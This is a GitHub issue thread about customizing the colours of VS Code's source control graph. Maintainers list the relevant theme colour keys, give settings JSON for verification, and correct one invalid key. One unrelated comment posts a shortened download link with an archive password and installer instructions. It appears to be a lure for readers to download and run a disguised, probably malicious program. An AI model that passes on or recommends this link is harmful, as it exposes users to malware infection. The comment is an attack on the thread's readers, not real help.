### ISSUE TITLE
Requesting customizable or alternative colour scheme for source control graph

### ISSUE THREAD

**Issue by rzhao271** [microsoft/vscode#226785]
Testing #226648

I was confused at first because I noticed a green branch merging into main and later on a red branch merging into main, and I wasn't sure whether the red colour meant something went wrong with that merge.

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by lszomoru** [comment]
This is supported using the following theme colors:
* scmGraph.historyItemRefColor - local branch
* scmGraph.historyItemRemoteRefColor - remote branch
* scmGraph.historyItemBaseRefColor - base branch(if it exists)
* scmGraph.foreground1 - branch color
* scmGraph.foreground2 - branch color
* scmGraph.foreground3 - branch color

**Comment by lszomoru** [comment]
Verifications steps:
1. Open a folder/workspace that contains a git repository 
2. Open the "Source Control Graph" view
3. Open your user settings JSON file
4. Use the following settings to customise the graph colours:
    ```
    "workbench.colorCustomizations": {
      "scmGraph.historyItemRefColor": "",
      "scmGraph.historyItemRemoteRefColor": "",
      "scmGraph.historyItemBaseRefColor": "",
      "scmGraph.foreground1": "",
      "scmGraph.foreground2": "",
      "scmGraph.foreground3": "",
      "scmGraph.foreground4": "",
      "scmGraph.foreground5": "",
      "scmGraph.foreground6": ""
    }
    ```

**Comment by alexr00** [comment]
It looks like `scmGraph.foreground6` isn't an allowed color, but otherwise this looks great.

**Comment by lszomoru** [comment]
My bad, copy/paste error. Thanks @alexr00.
